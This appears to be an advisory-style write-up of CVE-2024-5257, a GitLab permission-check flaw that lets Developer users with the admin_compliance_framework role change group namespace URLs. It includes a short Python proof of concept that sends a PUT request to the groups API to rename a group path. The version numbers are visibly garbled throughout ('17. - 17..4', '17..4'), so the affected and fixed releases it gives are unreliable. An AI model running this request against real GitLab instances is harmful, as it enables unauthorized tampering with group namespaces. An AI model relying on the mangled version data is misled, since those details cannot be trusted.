CVE-2024-5257 - Developer Users with `admin_compliance_framework` Custom Role Can Modify Group Namespace URLs in GitLab CE/EE (17. - 17..4, 17.1 - 17.1.2)

An issue with GitLab CE/EE (Community Edition/Enterprise Edition) has been identified where users with certain permissions can perform unauthorized operations. This vulnerability has been assigned the CVE identifier CVE-2024-5257.

Vulnerability Details

An issue was discovered in GitLab CE/EE where a Developer user with a custom role that includes the admin_compliance_framework permission may have been able to modify the URL for a group namespace. This issue arises from incorrect permission checks and impacts data integrity and potentially exposes sensitive information to unauthorized individuals.

Exploit Example

To demonstrate this exploit, consider a Developer user Alice with a custom role that has the admin_compliance_framework permission. If they are assigned to a project under the group namespace example-group, their permissions should not allow them to modify the URL of the group, but due to this vulnerability, they can.

Here is a code snippet showcasing the exploit

import requests

# GitLab instance URL and user access token
gitlab_url = "https://gitlab.example.com";
user_token = "Alice_user_token"

# Group ID where the URL should not be modified
group_id = "example-group"

# Attempt to modify the group URL
headers = {
    "Private-Token": user_token,
    "Content-Type": "application/json",
}
new_name = "modified-example-group"
data = {
    "path": new_name,
}

response = requests.put(f"{gitlab_url}/api/v4/groups/{group_id}", headers=headers, json=data)
print(response.status_code)

Under normal circumstances, the API request would return a 403 Forbidden status code, indicating that the user does not have permission to modify the group URL. However, when exploiting the CVE-2024-5257 vulnerability, the response will be a 200 OK status code, indicating that the operation was successful and the group URL is now modified.

This issue was first reported in the GitLab issue tracker

- GitLab 17. Security Release

For more details, please refer to the issue on the official GitLab website

- GitLab Issue #14053: Incorrect permission check for the namespace admin

GitLab has provided patches for the affected versions mentioned above

- Upgrading to GitLab 17..4 (Release Notes)
- Upgrading to GitLab 17.1.2 (Release Notes)

Users are advised to upgrade their GitLab CE/EE installations to the respective patched versions immediately to address this vulnerability.

Timeline

Published on: 07/11/2024 07:15:04 UTC
Last modified on: 07/12/2024 16:54:34 UTC